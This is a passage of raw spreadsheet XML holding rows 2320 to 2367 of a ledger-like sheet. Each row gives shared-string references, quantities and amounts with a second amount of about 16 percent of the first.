      <c r="I2320" s="14">
        <v>933.92</v>
      </c>
      <c r="J2320" s="15">
        <v>149.416</v>
      </c>
      <c r="K2320" s="16"/>
    </row>
    <row r="2321" spans="2:11">
      <c r="B2321" s="9">
        <v>2355</v>
      </c>
      <c r="C2321" s="238" t="s">
        <v>11133</v>
      </c>
      <c r="D2321" s="238" t="s">
        <v>11134</v>
      </c>
      <c r="E2321" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2321" s="238" t="s">
        <v>11041</v>
      </c>
      <c r="G2321" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2321" s="10">
        <v>88</v>
      </c>
      <c r="I2321" s="14">
        <v>406.11</v>
      </c>
      <c r="J2321" s="15">
        <v>64.9088</v>
      </c>
      <c r="K2321" s="16"/>
    </row>
    <row r="2322" spans="2:11">
      <c r="B2322" s="9">
        <v>2356</v>
      </c>
      <c r="C2322" s="238" t="s">
        <v>11135</v>
      </c>
      <c r="D2322" s="238" t="s">
        <v>7938</v>
      </c>
      <c r="E2322" s="238" t="s">
        <v>7939</v>
      </c>
      <c r="F2322" s="238" t="s">
        <v>11041</v>
      </c>
      <c r="G2322" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2322" s="10">
        <v>1</v>
      </c>
      <c r="I2322" s="14">
        <v>12350.43</v>
      </c>
      <c r="J2322" s="15">
        <v>1976.0688</v>
      </c>
      <c r="K2322" s="16"/>
    </row>
    <row r="2323" spans="2:11">
      <c r="B2323" s="9">
        <v>2357</v>
      </c>
      <c r="C2323" s="238" t="s">
        <v>11136</v>
      </c>
      <c r="D2323" s="238" t="s">
        <v>11137</v>
      </c>
      <c r="E2323" s="238" t="s">
        <v>7696</v>
      </c>
      <c r="F2323" s="238" t="s">
        <v>11041</v>
      </c>
      <c r="G2323" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2323" s="10">
        <v>3</v>
      </c>
      <c r="I2323" s="14">
        <v>3781.67</v>
      </c>
      <c r="J2323" s="15">
        <v>605.0688</v>
      </c>
      <c r="K2323" s="16"/>
    </row>
    <row r="2324" spans="2:11">
      <c r="B2324" s="9">
        <v>2358</v>
      </c>
      <c r="C2324" s="238" t="s">
        <v>11138</v>
      </c>
      <c r="D2324" s="238" t="s">
        <v>11139</v>
      </c>
      <c r="E2324" s="238" t="s">
        <v>11077</v>
      </c>
      <c r="F2324" s="238" t="s">
        <v>11140</v>
      </c>
      <c r="G2324" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2324" s="10">
        <v>13</v>
      </c>
      <c r="I2324" s="14">
        <v>786.69</v>
      </c>
      <c r="J2324" s="15">
        <v>125.8608</v>
      </c>
      <c r="K2324" s="16"/>
    </row>
    <row r="2325" spans="2:11">
      <c r="B2325" s="9">
        <v>2359</v>
      </c>
      <c r="C2325" s="238" t="s">
        <v>11141</v>
      </c>
      <c r="D2325" s="238" t="s">
        <v>11142</v>
      </c>
      <c r="E2325" s="238" t="s">
        <v>4750</v>
      </c>
      <c r="F2325" s="238" t="s">
        <v>11143</v>
      </c>
      <c r="G2325" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2325" s="10">
        <v>2</v>
      </c>
      <c r="I2325" s="14">
        <v>126.36</v>
      </c>
      <c r="J2325" s="15">
        <v>20.2176</v>
      </c>
      <c r="K2325" s="16"/>
    </row>
    <row r="2326" spans="2:11">
      <c r="B2326" s="9">
        <v>2360</v>
      </c>
      <c r="C2326" s="238" t="s">
        <v>11144</v>
      </c>
      <c r="D2326" s="238" t="s">
        <v>11145</v>
      </c>
      <c r="E2326" s="238" t="s">
        <v>11146</v>
      </c>
      <c r="F2326" s="238" t="s">
        <v>11147</v>
      </c>
      <c r="G2326" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2326" s="10">
        <v>4</v>
      </c>
      <c r="I2326" s="14">
        <v>58</v>
      </c>
      <c r="J2326" s="15">
        <v>9.28</v>
      </c>
      <c r="K2326" s="16"/>
    </row>
    <row r="2327" spans="2:11">
      <c r="B2327" s="9">
        <v>2361</v>
      </c>
      <c r="C2327" s="238" t="s">
        <v>11148</v>
      </c>
      <c r="D2327" s="238" t="s">
        <v>11149</v>
      </c>
      <c r="E2327" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F2327" s="238" t="s">
        <v>11150</v>
      </c>
      <c r="G2327" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2327" s="10">
        <v>3</v>
      </c>
      <c r="I2327" s="14">
        <v>795.67</v>
      </c>
      <c r="J2327" s="15">
        <v>127.3056</v>
      </c>
      <c r="K2327" s="16"/>
    </row>
    <row r="2328" spans="2:11">
      <c r="B2328" s="9">
        <v>2362</v>
      </c>
      <c r="C2328" s="238" t="s">
        <v>11151</v>
      </c>
      <c r="D2328" s="238" t="s">
        <v>11152</v>
      </c>
      <c r="E2328" s="238" t="s">
        <v>10947</v>
      </c>
      <c r="F2328" s="238" t="s">
        <v>11153</v>
      </c>
      <c r="G2328" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2328" s="10">
        <v>2</v>
      </c>
      <c r="I2328" s="14">
        <v>2197</v>
      </c>
      <c r="J2328" s="15">
        <v>351.52</v>
      </c>
      <c r="K2328" s="16"/>
    </row>
    <row r="2329" spans="2:11">
      <c r="B2329" s="9">
        <v>2363</v>
      </c>
      <c r="C2329" s="238" t="s">
        <v>11154</v>
      </c>
      <c r="D2329" s="238" t="s">
        <v>11155</v>
      </c>
      <c r="E2329" s="238" t="s">
        <v>10947</v>
      </c>
      <c r="F2329" s="238" t="s">
        <v>11156</v>
      </c>
      <c r="G2329" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2329" s="10">
        <v>2</v>
      </c>
      <c r="I2329" s="14">
        <v>1148</v>
      </c>
      <c r="J2329" s="15">
        <v>183.68</v>
      </c>
      <c r="K2329" s="16"/>
    </row>
    <row r="2330" spans="2:11">
      <c r="B2330" s="9">
        <v>2364</v>
      </c>
      <c r="C2330" s="238" t="s">
        <v>11157</v>
      </c>
      <c r="D2330" s="238" t="s">
        <v>11158</v>
      </c>
      <c r="E2330" s="238" t="s">
        <v>10947</v>
      </c>
      <c r="F2330" s="238" t="s">
        <v>11159</v>
      </c>
      <c r="G2330" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2330" s="10">
        <v>2</v>
      </c>
      <c r="I2330" s="14">
        <v>890</v>
      </c>
      <c r="J2330" s="15">
        <v>142.4</v>
      </c>
      <c r="K2330" s="16"/>
    </row>
    <row r="2331" spans="2:11">
      <c r="B2331" s="9">
        <v>2365</v>
      </c>
      <c r="C2331" s="238" t="s">
        <v>11160</v>
      </c>
      <c r="D2331" s="238" t="s">
        <v>11161</v>
      </c>
      <c r="E2331" s="238" t="s">
        <v>10947</v>
      </c>
      <c r="F2331" s="238" t="s">
        <v>11162</v>
      </c>
      <c r="G2331" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2331" s="10">
        <v>1</v>
      </c>
      <c r="I2331" s="14">
        <v>713</v>
      </c>
      <c r="J2331" s="15">
        <v>114.08</v>
      </c>
      <c r="K2331" s="16"/>
    </row>
    <row r="2332" spans="2:11">
      <c r="B2332" s="9">
        <v>2366</v>
      </c>
      <c r="C2332" s="238" t="s">
        <v>11163</v>
      </c>
      <c r="D2332" s="238" t="s">
        <v>11164</v>
      </c>
      <c r="E2332" s="238" t="s">
        <v>10947</v>
      </c>
      <c r="F2332" s="238" t="s">
        <v>11165</v>
      </c>
      <c r="G2332" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2332" s="10">
        <v>2</v>
      </c>
      <c r="I2332" s="14">
        <v>1363.93</v>
      </c>
      <c r="J2332" s="15">
        <v>218.2304</v>
      </c>
      <c r="K2332" s="16"/>
    </row>
    <row r="2333" spans="2:11">
      <c r="B2333" s="9">
        <v>2367</v>
      </c>
      <c r="C2333" s="238" t="s">
        <v>11166</v>
      </c>
      <c r="D2333" s="238" t="s">
        <v>11167</v>
      </c>
      <c r="E2333" s="238" t="s">
        <v>10947</v>
      </c>
      <c r="F2333" s="238" t="s">
        <v>11168</v>
      </c>
      <c r="G2333" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2333" s="10">
        <v>2</v>
      </c>
      <c r="I2333" s="14">
        <v>880</v>
      </c>
      <c r="J2333" s="15">
        <v>140.8</v>
      </c>
      <c r="K2333" s="16"/>
    </row>
    <row r="2334" spans="2:11">
      <c r="B2334" s="9">
        <v>2368</v>
      </c>
      <c r="C2334" s="238" t="s">
        <v>11169</v>
      </c>
      <c r="D2334" s="238" t="s">
        <v>11170</v>
      </c>
      <c r="E2334" s="238" t="s">
        <v>10947</v>
      </c>
      <c r="F2334" s="238" t="s">
        <v>11171</v>
      </c>
      <c r="G2334" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2334" s="10">
        <v>2</v>
      </c>
      <c r="I2334" s="14">
        <v>1148</v>
      </c>
      <c r="J2334" s="15">
        <v>183.68</v>
      </c>
      <c r="K2334" s="16"/>
    </row>
    <row r="2335" spans="2:11">
      <c r="B2335" s="9">
        <v>2369</v>
      </c>
      <c r="C2335" s="238" t="s">
        <v>11172</v>
      </c>
      <c r="D2335" s="238" t="s">
        <v>11173</v>
      </c>
      <c r="E2335" s="238" t="s">
        <v>10947</v>
      </c>
      <c r="F2335" s="238" t="s">
        <v>11174</v>
      </c>
      <c r="G2335" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2335" s="10">
        <v>2</v>
      </c>
      <c r="I2335" s="14">
        <v>895</v>
      </c>
      <c r="J2335" s="15">
        <v>143.2</v>
      </c>
      <c r="K2335" s="16"/>
    </row>
    <row r="2336" spans="2:11">
      <c r="B2336" s="9">
        <v>2370</v>
      </c>
      <c r="C2336" s="238" t="s">
        <v>11175</v>
      </c>
      <c r="D2336" s="238" t="s">
        <v>11176</v>
      </c>
      <c r="E2336" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2336" s="238" t="s">
        <v>11177</v>
      </c>
      <c r="G2336" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2336" s="10">
        <v>4</v>
      </c>
      <c r="I2336" s="14">
        <v>46.75</v>
      </c>
      <c r="J2336" s="15">
        <v>7.4816</v>
      </c>
      <c r="K2336" s="16"/>
    </row>
    <row r="2337" spans="2:11">
      <c r="B2337" s="9">
        <v>2371</v>
      </c>
      <c r="C2337" s="238" t="s">
        <v>11178</v>
      </c>
      <c r="D2337" s="238" t="s">
        <v>11179</v>
      </c>
      <c r="E2337" s="238" t="s">
        <v>8626</v>
      </c>
      <c r="F2337" s="238" t="s">
        <v>11180</v>
      </c>
      <c r="G2337" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2337" s="10">
        <v>4</v>
      </c>
      <c r="I2337" s="14">
        <v>657</v>
      </c>
      <c r="J2337" s="15">
        <v>105.12</v>
      </c>
      <c r="K2337" s="16"/>
    </row>
    <row r="2338" spans="2:11">
      <c r="B2338" s="9">
        <v>2372</v>
      </c>
      <c r="C2338" s="238" t="s">
        <v>11181</v>
      </c>
      <c r="D2338" s="238" t="s">
        <v>11182</v>
      </c>
      <c r="E2338" s="238" t="s">
        <v>8626</v>
      </c>
      <c r="F2338" s="238" t="s">
        <v>11183</v>
      </c>
      <c r="G2338" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2338" s="10">
        <v>4</v>
      </c>
      <c r="I2338" s="14">
        <v>624</v>
      </c>
      <c r="J2338" s="15">
        <v>99.84</v>
      </c>
      <c r="K2338" s="16"/>
    </row>
    <row r="2339" spans="2:11">
      <c r="B2339" s="9">
        <v>2373</v>
      </c>
      <c r="C2339" s="238" t="s">
        <v>11184</v>
      </c>
      <c r="D2339" s="238" t="s">
        <v>11185</v>
      </c>
      <c r="E2339" s="238" t="s">
        <v>11186</v>
      </c>
      <c r="F2339" s="238" t="s">
        <v>11187</v>
      </c>
      <c r="G2339" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2339" s="10">
        <v>8</v>
      </c>
      <c r="I2339" s="14">
        <v>200</v>
      </c>
      <c r="J2339" s="15">
        <v>32</v>
      </c>
      <c r="K2339" s="16"/>
    </row>
    <row r="2340" spans="2:11">
      <c r="B2340" s="9">
        <v>2374</v>
      </c>
      <c r="C2340" s="238" t="s">
        <v>11188</v>
      </c>
      <c r="D2340" s="238" t="s">
        <v>11189</v>
      </c>
      <c r="E2340" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F2340" s="238" t="s">
        <v>11190</v>
      </c>
      <c r="G2340" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2340" s="10">
        <v>12</v>
      </c>
      <c r="I2340" s="14">
        <v>908.32</v>
      </c>
      <c r="J2340" s="15">
        <v>145.3248</v>
      </c>
      <c r="K2340" s="16"/>
    </row>
    <row r="2341" spans="2:11">
      <c r="B2341" s="9">
        <v>2375</v>
      </c>
      <c r="C2341" s="238" t="s">
        <v>11191</v>
      </c>
      <c r="D2341" s="238" t="s">
        <v>11192</v>
      </c>
      <c r="E2341" s="238" t="s">
        <v>11193</v>
      </c>
      <c r="F2341" s="238" t="s">
        <v>7969</v>
      </c>
      <c r="G2341" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2341" s="10">
        <v>16</v>
      </c>
      <c r="I2341" s="14">
        <v>889.23</v>
      </c>
      <c r="J2341" s="15">
        <v>142.2848</v>
      </c>
      <c r="K2341" s="16"/>
    </row>
    <row r="2342" spans="2:11">
      <c r="B2342" s="9">
        <v>2376</v>
      </c>
      <c r="C2342" s="238" t="s">
        <v>11194</v>
      </c>
      <c r="D2342" s="238" t="s">
        <v>11195</v>
      </c>
      <c r="E2342" s="238" t="s">
        <v>11196</v>
      </c>
      <c r="F2342" s="238" t="s">
        <v>11197</v>
      </c>
      <c r="G2342" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2342" s="10">
        <v>4</v>
      </c>
      <c r="I2342" s="14">
        <v>152.11</v>
      </c>
      <c r="J2342" s="15">
        <v>24.3392</v>
      </c>
      <c r="K2342" s="16"/>
    </row>
    <row r="2343" spans="2:11">
      <c r="B2343" s="9">
        <v>2377</v>
      </c>
      <c r="C2343" s="238" t="s">
        <v>11198</v>
      </c>
      <c r="D2343" s="238" t="s">
        <v>11199</v>
      </c>
      <c r="E2343" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2343" s="238" t="s">
        <v>11200</v>
      </c>
      <c r="G2343" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2343" s="10">
        <v>16</v>
      </c>
      <c r="I2343" s="14">
        <v>190.01</v>
      </c>
      <c r="J2343" s="15">
        <v>30.4128</v>
      </c>
      <c r="K2343" s="16"/>
    </row>
    <row r="2344" spans="2:11">
      <c r="B2344" s="9">
        <v>2378</v>
      </c>
      <c r="C2344" s="238" t="s">
        <v>11201</v>
      </c>
      <c r="D2344" s="238" t="s">
        <v>11202</v>
      </c>
      <c r="E2344" s="238" t="s">
        <v>7316</v>
      </c>
      <c r="F2344" s="238" t="s">
        <v>11203</v>
      </c>
      <c r="G2344" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2344" s="10">
        <v>1</v>
      </c>
      <c r="I2344" s="14">
        <v>1600</v>
      </c>
      <c r="J2344" s="15">
        <v>256</v>
      </c>
      <c r="K2344" s="16"/>
    </row>
    <row r="2345" spans="2:11">
      <c r="B2345" s="9">
        <v>2379</v>
      </c>
      <c r="C2345" s="238" t="s">
        <v>11204</v>
      </c>
      <c r="D2345" s="238" t="s">
        <v>11205</v>
      </c>
      <c r="E2345" s="238" t="s">
        <v>7316</v>
      </c>
      <c r="F2345" s="238" t="s">
        <v>11206</v>
      </c>
      <c r="G2345" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2345" s="10">
        <v>1</v>
      </c>
      <c r="I2345" s="14">
        <v>294</v>
      </c>
      <c r="J2345" s="15">
        <v>47.04</v>
      </c>
      <c r="K2345" s="16"/>
    </row>
    <row r="2346" spans="2:11">
      <c r="B2346" s="9">
        <v>2380</v>
      </c>
      <c r="C2346" s="238" t="s">
        <v>11207</v>
      </c>
      <c r="D2346" s="238" t="s">
        <v>8314</v>
      </c>
      <c r="E2346" s="238" t="s">
        <v>8315</v>
      </c>
      <c r="F2346" s="238" t="s">
        <v>11208</v>
      </c>
      <c r="G2346" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2346" s="10">
        <v>80</v>
      </c>
      <c r="I2346" s="14">
        <v>1880.34</v>
      </c>
      <c r="J2346" s="15">
        <v>300.8</v>
      </c>
      <c r="K2346" s="16"/>
    </row>
    <row r="2347" spans="2:11">
      <c r="B2347" s="9">
        <v>2381</v>
      </c>
      <c r="C2347" s="238" t="s">
        <v>11209</v>
      </c>
      <c r="D2347" s="238" t="s">
        <v>6970</v>
      </c>
      <c r="E2347" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F2347" s="238" t="s">
        <v>6256</v>
      </c>
      <c r="G2347" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2347" s="10">
        <v>130</v>
      </c>
      <c r="I2347" s="14">
        <v>589.75</v>
      </c>
      <c r="J2347" s="15">
        <v>94.432</v>
      </c>
      <c r="K2347" s="16"/>
    </row>
    <row r="2348" spans="2:11">
      <c r="B2348" s="9">
        <v>2382</v>
      </c>
      <c r="C2348" s="238" t="s">
        <v>11210</v>
      </c>
      <c r="D2348" s="238" t="s">
        <v>11211</v>
      </c>
      <c r="E2348" s="238" t="s">
        <v>7631</v>
      </c>
      <c r="F2348" s="238" t="s">
        <v>11212</v>
      </c>
      <c r="G2348" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2348" s="10">
        <v>2</v>
      </c>
      <c r="I2348" s="14">
        <v>95.73</v>
      </c>
      <c r="J2348" s="15">
        <v>15.3184</v>
      </c>
      <c r="K2348" s="16"/>
    </row>
    <row r="2349" spans="2:11">
      <c r="B2349" s="9">
        <v>2383</v>
      </c>
      <c r="C2349" s="238" t="s">
        <v>11213</v>
      </c>
      <c r="D2349" s="238" t="s">
        <v>11214</v>
      </c>
      <c r="E2349" s="238" t="s">
        <v>11073</v>
      </c>
      <c r="F2349" s="238" t="s">
        <v>11215</v>
      </c>
      <c r="G2349" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2349" s="10">
        <v>3</v>
      </c>
      <c r="I2349" s="14">
        <v>474.6</v>
      </c>
      <c r="J2349" s="15">
        <v>75.936</v>
      </c>
      <c r="K2349" s="16"/>
    </row>
    <row r="2350" spans="2:11">
      <c r="B2350" s="9">
        <v>2384</v>
      </c>
      <c r="C2350" s="238" t="s">
        <v>11216</v>
      </c>
      <c r="D2350" s="238" t="s">
        <v>11217</v>
      </c>
      <c r="E2350" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F2350" s="238" t="s">
        <v>11218</v>
      </c>
      <c r="G2350" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2350" s="10">
        <v>2</v>
      </c>
      <c r="I2350" s="14">
        <v>626.44</v>
      </c>
      <c r="J2350" s="15">
        <v>100.2304</v>
      </c>
      <c r="K2350" s="16"/>
    </row>
    <row r="2351" spans="2:11">
      <c r="B2351" s="9">
        <v>2385</v>
      </c>
      <c r="C2351" s="238" t="s">
        <v>11219</v>
      </c>
      <c r="D2351" s="238" t="s">
        <v>11220</v>
      </c>
      <c r="E2351" s="238" t="s">
        <v>10980</v>
      </c>
      <c r="F2351" s="238" t="s">
        <v>11221</v>
      </c>
      <c r="G2351" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2351" s="10">
        <v>1</v>
      </c>
      <c r="I2351" s="14">
        <v>202</v>
      </c>
      <c r="J2351" s="15">
        <v>32.32</v>
      </c>
      <c r="K2351" s="16"/>
    </row>
    <row r="2352" spans="2:11">
      <c r="B2352" s="9">
        <v>2386</v>
      </c>
      <c r="C2352" s="238" t="s">
        <v>11222</v>
      </c>
      <c r="D2352" s="238" t="s">
        <v>11223</v>
      </c>
      <c r="E2352" s="238" t="s">
        <v>6985</v>
      </c>
      <c r="F2352" s="238" t="s">
        <v>11224</v>
      </c>
      <c r="G2352" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2352" s="10">
        <v>33</v>
      </c>
      <c r="I2352" s="14">
        <v>476.26</v>
      </c>
      <c r="J2352" s="15">
        <v>76.1904</v>
      </c>
      <c r="K2352" s="16"/>
    </row>
    <row r="2353" spans="2:11">
      <c r="B2353" s="9">
        <v>2387</v>
      </c>
      <c r="C2353" s="238" t="s">
        <v>11225</v>
      </c>
      <c r="D2353" s="238" t="s">
        <v>11226</v>
      </c>
      <c r="E2353" s="238" t="s">
        <v>11227</v>
      </c>
      <c r="F2353" s="238" t="s">
        <v>11228</v>
      </c>
      <c r="G2353" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2353" s="10">
        <v>344</v>
      </c>
      <c r="I2353" s="14">
        <v>307.04</v>
      </c>
      <c r="J2353" s="15">
        <v>48.9856</v>
      </c>
      <c r="K2353" s="16"/>
    </row>
    <row r="2354" spans="2:11">
      <c r="B2354" s="9">
        <v>2388</v>
      </c>
      <c r="C2354" s="238" t="s">
        <v>11229</v>
      </c>
      <c r="D2354" s="238" t="s">
        <v>11230</v>
      </c>
      <c r="E2354" s="238" t="s">
        <v>11231</v>
      </c>
      <c r="F2354" s="238" t="s">
        <v>11232</v>
      </c>
      <c r="G2354" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2354" s="10">
        <v>24</v>
      </c>
      <c r="I2354" s="14">
        <v>536.99</v>
      </c>
      <c r="J2354" s="15">
        <v>85.9008</v>
      </c>
      <c r="K2354" s="16"/>
    </row>
    <row r="2355" spans="2:11">
      <c r="B2355" s="9">
        <v>2389</v>
      </c>
      <c r="C2355" s="238" t="s">
        <v>11233</v>
      </c>
      <c r="D2355" s="238" t="s">
        <v>11234</v>
      </c>
      <c r="E2355" s="238" t="s">
        <v>11235</v>
      </c>
      <c r="F2355" s="9"/>
      <c r="G2355" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2355" s="10">
        <v>7</v>
      </c>
      <c r="I2355" s="14">
        <v>18683.94</v>
      </c>
      <c r="J2355" s="15">
        <v>2989.4256</v>
      </c>
      <c r="K2355" s="16"/>
    </row>
    <row r="2356" spans="2:11">
      <c r="B2356" s="9">
        <v>2390</v>
      </c>
      <c r="C2356" s="238" t="s">
        <v>11236</v>
      </c>
      <c r="D2356" s="238" t="s">
        <v>11237</v>
      </c>
      <c r="E2356" s="238" t="s">
        <v>11238</v>
      </c>
      <c r="F2356" s="9"/>
      <c r="G2356" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2356" s="10">
        <v>2</v>
      </c>
      <c r="I2356" s="14">
        <v>1067.95</v>
      </c>
      <c r="J2356" s="15">
        <v>170.8736</v>
      </c>
      <c r="K2356" s="16"/>
    </row>
    <row r="2357" spans="2:11">
      <c r="B2357" s="9">
        <v>2391</v>
      </c>
      <c r="C2357" s="238" t="s">
        <v>11239</v>
      </c>
      <c r="D2357" s="238" t="s">
        <v>8367</v>
      </c>
      <c r="E2357" s="238" t="s">
        <v>8368</v>
      </c>
      <c r="F2357" s="238" t="s">
        <v>11240</v>
      </c>
      <c r="G2357" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H2357" s="10">
        <v>198</v>
      </c>
      <c r="I2357" s="14">
        <v>220280.36</v>
      </c>
      <c r="J2357" s="15">
        <v>35244.9504</v>
      </c>
      <c r="K2357" s="16"/>
    </row>
    <row r="2358" spans="2:11">
      <c r="B2358" s="9">
        <v>2392</v>
      </c>
      <c r="C2358" s="238" t="s">
        <v>11241</v>
      </c>
      <c r="D2358" s="238" t="s">
        <v>11242</v>
      </c>
      <c r="E2358" s="238" t="s">
        <v>7457</v>
      </c>
      <c r="F2358" s="238" t="s">
        <v>11243</v>
      </c>
      <c r="G2358" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2358" s="10">
        <v>1</v>
      </c>
      <c r="I2358" s="14">
        <v>376.07</v>
      </c>
      <c r="J2358" s="15">
        <v>60.1712</v>
      </c>
      <c r="K2358" s="16"/>
    </row>
    <row r="2359" spans="2:11">
      <c r="B2359" s="9">
        <v>2393</v>
      </c>
      <c r="C2359" s="238" t="s">
        <v>11244</v>
      </c>
      <c r="D2359" s="238" t="s">
        <v>11245</v>
      </c>
      <c r="E2359" s="238" t="s">
        <v>4912</v>
      </c>
      <c r="F2359" s="238" t="s">
        <v>11246</v>
      </c>
      <c r="G2359" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2359" s="10">
        <v>1</v>
      </c>
      <c r="I2359" s="14">
        <v>1.36</v>
      </c>
      <c r="J2359" s="15">
        <v>0.2176</v>
      </c>
      <c r="K2359" s="16"/>
    </row>
    <row r="2360" spans="2:11">
      <c r="B2360" s="9">
        <v>2394</v>
      </c>
      <c r="C2360" s="238" t="s">
        <v>11247</v>
      </c>
      <c r="D2360" s="238" t="s">
        <v>11248</v>
      </c>
      <c r="E2360" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F2360" s="238" t="s">
        <v>11249</v>
      </c>
      <c r="G2360" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2360" s="10">
        <v>1</v>
      </c>
      <c r="I2360" s="14">
        <v>387.1</v>
      </c>
      <c r="J2360" s="15">
        <v>61.936</v>
      </c>
      <c r="K2360" s="16"/>
    </row>
    <row r="2361" spans="2:11">
      <c r="B2361" s="9">
        <v>2395</v>
      </c>
      <c r="C2361" s="238" t="s">
        <v>11250</v>
      </c>
      <c r="D2361" s="238" t="s">
        <v>11251</v>
      </c>
      <c r="E2361" s="238" t="s">
        <v>9060</v>
      </c>
      <c r="F2361" s="238" t="s">
        <v>11252</v>
      </c>
      <c r="G2361" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2361" s="10">
        <v>9</v>
      </c>
      <c r="I2361" s="14">
        <v>10.69</v>
      </c>
      <c r="J2361" s="15">
        <v>1.7136</v>
      </c>
      <c r="K2361" s="16"/>
    </row>
    <row r="2362" spans="2:11">
      <c r="B2362" s="9">
        <v>2396</v>
      </c>
      <c r="C2362" s="238" t="s">
        <v>11253</v>
      </c>
      <c r="D2362" s="238" t="s">
        <v>11254</v>
      </c>
      <c r="E2362" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F2362" s="238" t="s">
        <v>11187</v>
      </c>
      <c r="G2362" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2362" s="10">
        <v>1</v>
      </c>
      <c r="I2362" s="14">
        <v>67.39</v>
      </c>
      <c r="J2362" s="15">
        <v>10.7824</v>
      </c>
      <c r="K2362" s="16"/>
    </row>
    <row r="2363" spans="2:11">
      <c r="B2363" s="9">
        <v>2397</v>
      </c>
      <c r="C2363" s="238" t="s">
        <v>11255</v>
      </c>
      <c r="D2363" s="238" t="s">
        <v>11256</v>
      </c>
      <c r="E2363" s="238" t="s">
        <v>11257</v>
      </c>
      <c r="F2363" s="238" t="s">
        <v>11258</v>
      </c>
      <c r="G2363" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2363" s="10">
        <v>1</v>
      </c>
      <c r="I2363" s="14">
        <v>2410.26</v>
      </c>
      <c r="J2363" s="15">
        <v>385.6416</v>
      </c>
      <c r="K2363" s="16"/>
    </row>
    <row r="2364" spans="2:11">
      <c r="B2364" s="9">
        <v>2398</v>
      </c>
      <c r="C2364" s="238" t="s">
        <v>11259</v>
      </c>
      <c r="D2364" s="238" t="s">
        <v>11260</v>
      </c>
      <c r="E2364" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F2364" s="238" t="s">
        <v>11261</v>
      </c>
      <c r="G2364" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2364" s="10">
        <v>152</v>
      </c>
      <c r="I2364" s="14">
        <v>3370.45</v>
      </c>
      <c r="J2364" s="15">
        <v>1347.936</v>
      </c>
      <c r="K2364" s="16"/>
    </row>
    <row r="2365" spans="2:11">
      <c r="B2365" s="9">
        <v>2399</v>
      </c>
      <c r="C2365" s="238" t="s">
        <v>11262</v>
      </c>
      <c r="D2365" s="238" t="s">
        <v>11263</v>
      </c>
      <c r="E2365" s="238" t="s">
        <v>11131</v>
      </c>
      <c r="F2365" s="238" t="s">
        <v>11264</v>
      </c>
      <c r="G2365" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2365" s="10">
        <v>15</v>
      </c>
      <c r="I2365" s="14">
        <v>118.06</v>
      </c>
      <c r="J2365" s="15">
        <v>18.888</v>
      </c>
      <c r="K2365" s="16"/>
    </row>
    <row r="2366" spans="2:11">
      <c r="B2366" s="9">
        <v>2400</v>
      </c>
      <c r="C2366" s="238" t="s">
        <v>11265</v>
      </c>
      <c r="D2366" s="238" t="s">
        <v>11266</v>
      </c>
      <c r="E2366" s="238" t="s">
        <v>7800</v>
      </c>
      <c r="F2366" s="238" t="s">
        <v>11267</v>
      </c>
      <c r="G2366" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2366" s="10">
        <v>210</v>
      </c>
      <c r="I2366" s="14">
        <v>8700.59</v>
      </c>
      <c r="J2366" s="15">
        <v>1392.048</v>
      </c>
      <c r="K2366" s="16"/>
    </row>
    <row r="2367" spans="2:11">
      <c r="B2367" s="9">
        <v>2401</v>
      </c>
      <c r="C2367" s="238" t="s">
        <v>11268</v>
      </c>
      <c r="D2367" s="238" t="s">
        <v>11269</v>
      </c>
      <c r="E2367" s="238" t="s">
        <v>6734</v>
      </c>
      <c r="F2367" s="238" t="s">
        <v>11270</v>
      </c>
      <c r="G2367" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2367" s="10">
        <v>18</v>
      </c>
      <c r="I2367" s="14">
        <v>9345.38</v>
      </c>
      <c r="J2367" s="15">
        <v>1495.2672</v>
      </c>
